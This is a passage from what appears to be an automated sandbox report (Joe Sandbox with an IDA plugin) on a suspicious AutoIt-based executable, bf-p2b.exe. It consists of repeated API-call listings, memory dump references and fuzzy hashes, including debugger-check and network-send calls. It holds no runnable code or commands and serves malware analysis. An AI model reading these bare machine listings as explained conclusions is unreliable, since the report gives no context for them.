                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _wcscmp
                          • String ID: 0.0.0.0
                          • API String ID: 856254489-3771769585
                          • Opcode ID: df2bd9c6ff22437f0a62cb9bc5d6cab5609193df364278e0c9e0efa8079b1f5e
                          • Instruction ID: 813eb58f145528646d459c9c855f56f6b01da139d8710a998917e2d9d6d55d1d
                          • Opcode Fuzzy Hash: df2bd9c6ff22437f0a62cb9bc5d6cab5609193df364278e0c9e0efa8079b1f5e
                          • Instruction Fuzzy Hash: 3E11E035700604EBCB14EF25CAC1E69B3E9AF94710B1480D9FA05BF391DA70EE85DBA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • _memset.LIBCMT ref: 00B73CF1
                            • Part of subcall function 00B031B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00B031DA
                            • Part of subcall function 00B03A67: SHGetMalloc.SHELL32(00B03C31), ref: 00B03A7D
                            • Part of subcall function 00B03A67: SHGetDesktopFolder.SHELL32(?), ref: 00B03A8F
                            • Part of subcall function 00B03A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00B03AD2
                            • Part of subcall function 00B03B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,00BC22E8,?), ref: 00B03B65
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                          • String ID: X
                          • API String ID: 2727075218-3081909835
                          • Opcode ID: 319ac2ba478a3b82ec26ec3e4af6ab5fc83ba99f7222d5a1002dc0628d372217
                          • Instruction ID: ca9370463a7f5e03b6ea57fd67cb52498a520a5c9fdc7c5c7bcb5ea37309910b
                          • Opcode Fuzzy Hash: 319ac2ba478a3b82ec26ec3e4af6ab5fc83ba99f7222d5a1002dc0628d372217
                          • Instruction Fuzzy Hash: A9117B71A102586BCF05DF98D8496DE7FFDEF46B04F04404AE401BB281DBF556498BA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00B734AA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                          • API String ID: 1029625771-2684727018
                          • Opcode ID: cf0d26797aec6136aab3d5fa3603d30c0033faad634260ff652f652c48fca55a
                          • Instruction ID: 52fefa0e4da8bed5cf53ea35c25b648d39eb409600c52d68dfbef1f0f925e5b6
                          • Opcode Fuzzy Hash: cf0d26797aec6136aab3d5fa3603d30c0033faad634260ff652f652c48fca55a
                          • Instruction Fuzzy Hash: 37F0497190410DAACF15EFB0D8958FFBBFCAE10710B1085A6A426911D2DB749B09D720
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B478AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 00B478CB
                          • CoInitialize.OLE32(00000000), ref: 00B4F04D
                            • Part of subcall function 00B084A6: __swprintf.LIBCMT ref: 00B084E5
                            • Part of subcall function 00B084A6: __itow.LIBCMT ref: 00B08519
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: FullInitializeNamePath__itow__swprintf
                          • String ID: .lnk
                          • API String ID: 35104896-24824748
                          • Opcode ID: e86e0e882b21ff2d7e4959809f0b724fa4d215af217a7f416dcae3fc57321210
                          • Instruction ID: 840fa618d3bcc0fc06800e1ff1a820fb1862fb0de6ad5cd0093c0a958475c17d
                          • Opcode Fuzzy Hash: e86e0e882b21ff2d7e4959809f0b724fa4d215af217a7f416dcae3fc57321210
                          • Instruction Fuzzy Hash: 45A149756043029FCB14DF14C884D6ABBE5FF89320F158999F896AB3A1CB31EE45CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5a2844fa6970f88d0881cb49d4ddc206cb532d62a01fbc7b7174eca484eb47cb
                          • Instruction ID: 4215ea2ca4e157673aa162a75d0daafce6131cf762d9479423ef83d13a67fbfd
                          • Opcode Fuzzy Hash: 5a2844fa6970f88d0881cb49d4ddc206cb532d62a01fbc7b7174eca484eb47cb
                          • Instruction Fuzzy Hash: 8C5191316047029FCB14EF28D491BAA77E5EF48310F5485EDF9AA8B2D2DB30E945CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetCursorPos.USER32(?), ref: 00B58074
                          • GetForegroundWindow.USER32 ref: 00B5807A
                            • Part of subcall function 00B56B19: GetWindowRect.USER32(?,?), ref: 00B56B2C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$CursorForegroundRect
                          • String ID:
                          • API String ID: 1066937146-0
                          • Opcode ID: 027caea322cda30ad093408cefd6297a2fc77d9fa14ae7ec3d9c533f0e1a81e6
                          • Instruction ID: 92bcb4c67fd6f125cb8eb1bf2189f47a14de92ecf23951d4dc07926cbeb00602
                          • Opcode Fuzzy Hash: 027caea322cda30ad093408cefd6297a2fc77d9fa14ae7ec3d9c533f0e1a81e6
                          • Instruction Fuzzy Hash: BF311A75900208AFDB00EFA4C881AEEB7F9FF18314F5044AAE956B7251DB34AE55CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • IsWindow.USER32(00000000), ref: 00B7DB31
                          • IsWindow.USER32(00000000), ref: 00B7DB6B
                            • Part of subcall function 00B01F04: GetForegroundWindow.USER32 ref: 00B01FBE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$Foreground
                          • String ID:
                          • API String ID: 62970417-0
                          • Opcode ID: c2d8707ba48684b2171bc3720692e1a6c3dcd9314be71b728bbdbf784c7f9532
                          • Instruction ID: 1f328651e02a00910c5dbca78cc5ac2f1da457dd8a337c0ec40f00e00c499d60
                          • Opcode Fuzzy Hash: c2d8707ba48684b2171bc3720692e1a6c3dcd9314be71b728bbdbf784c7f9532
                          • Instruction Fuzzy Hash: A921A572600206ABDB15AB74C891FFE7BE9DF80784F0148A9F95A87191DF70EE05D760
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B0193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B01952
                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B3E344
                          • _strlen.LIBCMT ref: 00B3E34F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$Timeout_strlen
                          • String ID:
                          • API String ID: 2777139624-0
                          • Opcode ID: c297dc66a28556305fd1b51037b330b19343f073d80eed5c2dd942234e88c7c8
                          • Instruction ID: 0e9185980fb9b14fadea121c4f1a02e0f28bbc48cbec95ea2dad4234f72ee604
                          • Opcode Fuzzy Hash: c297dc66a28556305fd1b51037b330b19343f073d80eed5c2dd942234e88c7c8
                          • Instruction Fuzzy Hash: CF11A3316002046BDB05BB68ECC6DBE7BE9DF45340F1044BAF60ADB1E2DE64E84687A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • 745EC8D0.UXTHEME ref: 00B036E6
                            • Part of subcall function 00B22025: __lock.LIBCMT ref: 00B2202B
                            • Part of subcall function 00B032DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00B032F6
                            • Part of subcall function 00B032DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B0330B
                            • Part of subcall function 00B0374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00B0376D
                            • Part of subcall function 00B0374E: IsDebuggerPresent.KERNEL32(?,?), ref: 00B0377F
                            • Part of subcall function 00B0374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\bf-p2b.exe,00000104,?,00BC1120,C:\Users\user\Desktop\bf-p2b.exe,00BC1124,?,?), ref: 00B037EE
                            • Part of subcall function 00B0374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00B03860
                          • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00B03726
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                          • String ID:
                          • API String ID: 3809921791-0
                          • Opcode ID: c5a46c5917f16b82de217f0ce07a52bc99ab7e11426f122fa8f4ac51ed9f07de
                          • Instruction ID: 302ec271e158f76177c532f9e534459d7f5dbe4fa02d5ea1db9b37a8797e1f72
                          • Opcode Fuzzy Hash: c5a46c5917f16b82de217f0ce07a52bc99ab7e11426f122fa8f4ac51ed9f07de
                          • Instruction Fuzzy Hash: C4116A719083419FC300DF29E949D5ABBE9FB99710F00895EF484972B2DB709984CB96
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,00B04C2B,?,?,?,?,00B0BE63), ref: 00B04BB6
                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,00B04C2B,?,?,?,?,00B0BE63), ref: 00B74972
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 250bc5cc2082522ac7e7d6d329366bb567897e83cfd6fd7a03b55ffff8db6ec5
                          • Instruction ID: d954b91565146e404559b58ca721c8dae4063ef45a330418e970743fe3c4ff15
                          • Opcode Fuzzy Hash: 250bc5cc2082522ac7e7d6d329366bb567897e83cfd6fd7a03b55ffff8db6ec5
                          • Instruction Fuzzy Hash: 80016DB0244208BEF2245E248CCAF667BDCEB057A8F108399BBE56A1E0C7B09C448B50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00B4AEA5,?,?,00000000,00000008), ref: 00B1F282
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00B4AEA5,?,?,00000000,00000008), ref: 00B1F2A6
                            • Part of subcall function 00B1F2D0: _memmove.LIBCMT ref: 00B1F307
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$_memmove
                          • String ID:
                          • API String ID: 3033907384-0
                          • Opcode ID: b65ed3f47cc2aa33350b72b0e6713418bd007c6f3125b7f81ead1b3813628c6d
                          • Instruction ID: 89a19919612754956555fe33ba8e4331268f2c8458ebac8e81f72fb126b0cde8
                          • Opcode Fuzzy Hash: b65ed3f47cc2aa33350b72b0e6713418bd007c6f3125b7f81ead1b3813628c6d
                          • Instruction Fuzzy Hash: F0F03CB6114114BFAB10BB65AC88DBB7BEDEF8A3607808066FD08DA151CA35DC40C7B4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • ___lock_fhandle.LIBCMT ref: 00B2F7D9
                          • __close_nolock.LIBCMT ref: 00B2F7F2
                            • Part of subcall function 00B2886A: __getptd_noexit.LIBCMT ref: 00B2886A
                            • Part of subcall function 00B2889E: __getptd_noexit.LIBCMT ref: 00B2889E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                          • String ID:
                          • API String ID: 1046115767-0
                          • Opcode ID: d7fcf11fe73cd518898964a06c768f8ef3a33b851a419a64d8c93e8a2d942737
                          • Instruction ID: 1d43e11a488b36b4c68cd54a3f135edcd605985a97ced1ca3441a3b78c97dc6f
                          • Opcode Fuzzy Hash: d7fcf11fe73cd518898964a06c768f8ef3a33b851a419a64d8c93e8a2d942737
                          • Instruction Fuzzy Hash: 23115E32816671CAD7117BA8B882768B6E09F45331F5502E0E56C5F2E2CFB45D4086A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00B0352A
                            • Part of subcall function 00B07E53: _memmove.LIBCMT ref: 00B07EB9
                          • _wcscat.LIBCMT ref: 00B766C0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: FullNamePath_memmove_wcscat
                          • String ID:
                          • API String ID: 257928180-0
                          • Opcode ID: 3831cbb71cf25fff6cc54c6487be1229b1d8a05149e498dc2167d1e44de848e8
                          • Instruction ID: dda7068bb09c851d02f91f970f263077c7208b490544e2c8fa045a843b2808e8
                          • Opcode Fuzzy Hash: 3831cbb71cf25fff6cc54c6487be1229b1d8a05149e498dc2167d1e44de848e8
                          • Instruction Fuzzy Hash: D301617594410CAACF00EBA4DC49ED97BFDEF24748F0085E5A915E31E1EE309B858B51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • send.WS2_32(00000000,?,00000000,00000000), ref: 00B59534
                          • WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 00B59557
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ErrorLastsend
                          • String ID:
                          • API String ID: 1802528911-0
                          • Opcode ID: c1a7733c47904b58b66acab8c05f416d48a9f7c96c512138a0325fc672db7c2f
                          • Instruction ID: 35dbaf7e16c610af3f3821290721dfc30268a207d890698756e976651b722054
                          • Opcode Fuzzy Hash: c1a7733c47904b58b66acab8c05f416d48a9f7c96c512138a0325fc672db7c2f
                          • Instruction Fuzzy Hash: 8E014F35200200AFD714EF68D891F6AB7E9EF99721F1085AEEA5A87391DB70EC05CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B2889E: __getptd_noexit.LIBCMT ref: 00B2889E
                          • __lock_file.LIBCMT ref: 00B242B9
                            • Part of subcall function 00B25A9F: __lock.LIBCMT ref: 00B25AC2
                          • __fclose_nolock.LIBCMT ref: 00B242C4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                          • String ID:
                          • API String ID: 2800547568-0
                          • Opcode ID: 2eb68c67bfabb5d9c28d1e441291f00e57de5598be8e3c2a47b94ae26f241c1e
                          • Instruction ID: 9cc2e67f3b80901ed48fe83cb1fb060eee2167fd52179bd0b0a4a60363f6d6ef
                          • Opcode Fuzzy Hash: 2eb68c67bfabb5d9c28d1e441291f00e57de5598be8e3c2a47b94ae26f241c1e
                          • Instruction Fuzzy Hash: A7F0B431921734DAD710AB76A8027AE67E06F41334F2182C9B82C9B5D1CBBC9D019B55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • timeGetTime.WINMM ref: 00B1F57A
                            • Part of subcall function 00B0E1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B0E279
                          • Sleep.KERNEL32(00000000), ref: 00B775D3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessagePeekSleepTimetime
                          • String ID:
                          • API String ID: 1792118007-0
                          • Opcode ID: 3a556596964007a206d147be11939cdd1f5aa1e0a52bc7330822c5de9603fb3c
                          • Instruction ID: 99c9a1ffde7f8d99c38898598c52c2a7610ec00a2ffb63a1956e092d0a10de77
                          • Opcode Fuzzy Hash: 3a556596964007a206d147be11939cdd1f5aa1e0a52bc7330822c5de9603fb3c
